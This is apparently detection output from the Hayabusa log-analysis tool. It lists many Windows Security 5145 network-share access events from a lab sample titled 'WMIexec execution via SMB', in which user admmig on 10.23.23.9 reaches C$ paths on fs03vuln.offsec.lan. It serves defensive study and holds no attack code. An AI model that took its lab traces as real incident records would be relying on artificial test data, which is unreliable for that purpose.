10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W15cd0137#\37435834252683aa469b56ff5b1fa582 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W37d1a032# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W37d1a032#\3000cd8689f492cfebdd90745d8ff4f5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W39c436dd# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W39c436dd#\1e419fc634fa508e323ce21b5ed38e24 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W69ef49d2# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W69ef49d2#\3904c1c8a3c65252ed404558b48ebbc1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W71daf281# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W71daf281#\4dc6f876453e5e2ebf2a9ee674543449 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W81a3882f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W81a3882f#\a85f95161dcf12987a79a1b41adbdb9c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W708fc392# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W708fc392#\8f2dcf5025667bf632e62398c422a6da : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W5052cbb1# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W5052cbb1#\3d4dc36b565611250515cd25ebe64bed : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W57798b05# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W57798b05#\a9ccbdffc3a6a0fca980872c1531aa02 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W73044bb5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W73044bb5#\ca9e965c5eab4b76dc40c510a6a4a916 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W193497eb# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W193497eb#\2ebfdca668bed840047e6bcbeec44e53 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W08054466# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W08054466#\728711ada9b68483d998f34ac723c295 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad38fd8b# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad38fd8b#\9158e541821e2b6d43c32648464e77c2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.079 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad78daf4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.079 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad78daf4#\81b597084cf1f78a1957cf8138744f32 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.096 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\desktop.ini : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d030b7# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d030b7#\fa5c1a0df187c30480b0623065a70395 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d06916# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d06916#\d61b7f885a9fd4f4766031b996ca7d6a : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb9b5bb58# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.114 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.114 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb9b5bb58#\094367b5bb80758c8f0ab02018658d91 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management 
Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Contacts\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wbc80354b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Documents\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wbc80354b#\1dd94a4862b69a4583662583681346ca : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Downloads\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wc1cc6649# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Favorites\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wc1cc6649#\c869d6724028906387ff9f65e11cd9a4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Links\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wca5f1176# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Music\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wca5f1176#\0e765b6e054c8bac98f30ced03330615 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Pictures\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wcffedcb4# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Saved Games\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wcffedcb4#\37b337245bcc60a0f8c6cc814157fd9f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Searches\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd75d181a# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Videos\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd75d181a#\ff89d7fa29ebae7dfdd1cf2db43686dc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 